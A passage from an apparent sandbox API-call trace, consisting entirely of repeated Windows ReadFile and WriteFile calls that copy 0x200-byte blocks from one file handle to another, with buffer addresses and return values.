lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.279] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.279] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x262, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.280] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.280] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.281] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.281] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.282] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.282] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.283] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.283] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x252, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.284] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.284] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.285] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.285] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.286] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.286] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.288] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.288] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.289] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.289] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.290] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.290] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x26f, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.291] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.291] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.292] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.292] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.293] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.293] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.294] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.294] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.295] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.295] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.296] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2e8, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.296] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.297] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.297] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.298] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.298] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.299] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.299] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.300] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.300] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.301] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.301] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1c7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x153, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3d7, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x267, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x10d, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x6b, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x3bf, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.329] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x36c, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1bc, lpOverlapped=0x0 | out: lpBuffer=0x4bd1f4*, lpNumberOfBytesRead=0x4bd1bc*=0x200, lpOverlapped=0x0) returned 1 [0021.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0021.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, 